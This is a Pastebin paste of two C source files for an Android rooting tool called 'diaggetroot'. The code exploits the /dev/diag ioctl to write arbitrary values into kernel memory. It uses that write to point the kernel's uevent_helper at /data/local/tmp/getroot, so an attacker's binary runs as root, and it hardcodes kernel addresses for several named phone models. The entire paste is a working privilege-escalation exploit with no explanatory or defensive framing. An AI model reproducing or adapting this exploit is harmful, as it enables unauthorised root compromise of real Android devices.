Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ################## jni.c ###########################
- #include <stdio.h>
- #include <stdint.h>
- #include <stdlib.h>
- #include <unistd.h>
- #include <jni.h>
- #include <sys/mman.h>
- #define LOG_TAG "diaggetroot"
- #define LOGI(...) __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)
- #define LOGD(...) __android_log_print(ANDROID_LOG_DEBUG,LOG_TAG,__VA_ARGS__)
- #define LOGE(...) __android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)
- #include <android/log.h>
- struct values {
- unsigned addr;
- unsigned short value;
- };
- extern void b(void* adr, int value, int fd);
- int cmpare( const void * a , const void * b ) {
- const struct values *x = a;
- const struct values *y = b;
- if(x->value < y->value) {
- return -1;
- }
- if(x->value == y->value) {
- return 0;
- }
- return 1;
- }
- static void uevent_helper_mod(int fd)
- {
- // unsigned _buf = 0xc0d0dfd0; //htc batterfly uevent_helper_buffer
- unsigned _buf = 0xC0643D20; //is03
- const char* path="/data/local/tmp/getroot\0";
- struct values datas[400];
- int i, j;
- j=0;
- for(i=0; i<strlen(path); i+=2){
- datas[j].addr = _buf+ i;
- datas[j].value = path[i] | (path[i+1] << 8);
- j++;
- }
- qsort( datas, j, sizeof(struct values), cmpare);
- for(i=0; i<j; i++){
- LOGD("data[%d] addr=%x value=%x", i, datas[i].addr, datas[i].value);
- b((void*)datas[i].addr, datas[i].value, fd);
- }
- }
- static void write_value(int fd, unsigned address, unsigned value)
- {
- // b((void*)0xc0da86d0, 0xa924, fd);
- // b((void*)0xc0da86d2, 0xc034, fd);
- printf("write_value(0x%x, 0x%x)\n", address, value);
- b((void*)address, value & 0xffff, fd);
- b((void*)address+2, (value >> 16) & 0xffff, fd);
- }
- void
- Java_com_example_diaggetroot_MainActivity_getrootnative( JNIEnv* env,
- jobject thiz, int fd)
- {
- uevent_helper_mod(fd);
- }
- extern unsigned p_delayed_rsp_id;
- int main(int argc, char** argv)
- {
- unsigned long address = 0;
- unsigned long value = 0;
- char *endptr;
- if(argc < 2) {
- printf("%s address value\n", argv[0]);
- return 0;
- }
- address = strtoll(argv[1], &endptr, 0);
- value = strtoll(argv[2], &endptr, 0);
- if(argc > 3){
- p_delayed_rsp_id = strtoll(argv[3], &endptr, 0);
- }
- write_value(0, address, value);
- // uevent_helper_mod(0);
- return 0;
- }
- ################## diag.c ###########################
- #include <stdio.h>
- #include <unistd.h>
- #include <errno.h>
- #include <signal.h>
- #include <stdlib.h>
- #include <dlfcn.h>
- #include <elf.h>
- #include <sys/system_properties.h>
- #include <fcntl.h>
- #include <stdarg.h>
- #define LOG_TAG "diaggetroot"
- #define LOGI(...) __android_log_print(ANDROID_LOG_INFO,LOG_TAG,__VA_ARGS__)
- #define LOGD(...) __android_log_print(ANDROID_LOG_DEBUG,LOG_TAG,__VA_ARGS__)
- #define LOGE(...) __android_log_print(ANDROID_LOG_ERROR,LOG_TAG,__VA_ARGS__)
- #include <android/log.h>
- #define DIAG_IOCTL_GET_DELAYED_RSP_ID 8
- struct diagpkt_delay_params{
- void *rsp_ptr;
- int size;
- int *num_bytes_ptr;
- };
- unsigned p_delayed_rsp_id = 0xc0da86ec;
- static void b2(void* adr, int value, int fd)
- {
- uint16_t ptr;
- int i;
- int num;
- int ret;
- struct diagpkt_delay_params p;
- ptr = 0;
- p.rsp_ptr = &ptr;
- p.size = 2;
- p.num_bytes_ptr = (void*)p_delayed_rsp_id; // SH02E
- // p.num_bytes_ptr = (void*)0xC06485A8; // IS03
- // p.num_bytes_ptr = (void*)0xc0ba8394; // HTC butterfly
- ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);
- ptr = 0;
- p.rsp_ptr = &ptr;
- p.size = 2;
- num = 0;
- p.num_bytes_ptr = #
- ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);
- ptr = (value - ptr) & 0xffff;
- LOGD("loop = %x\n", ptr);
- printf("loop = %x\n", ptr);
- for(i=0; i< ptr; i++) {
- num = 0;
- p.rsp_ptr = adr;
- p.size = 2;
- p.num_bytes_ptr = #
- ret = ioctl(fd, DIAG_IOCTL_GET_DELAYED_RSP_ID, &p);
- }
- }
- void b(void* adr, int value, int fd)
- {
- static int fd2;
- // printf("delayed_rsp_id = 0x%x\n", p_delayed_rsp_id);
- if(fd == 0){
- if(fd2 == 0){
- fd2 = open("/dev/diag", O_RDWR);
- }
- fd = fd2;
- }
- if(fd < 0) {
- LOGE("fd=%d", fd);
- return;
- }
- b2(adr, value, fd);
- }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement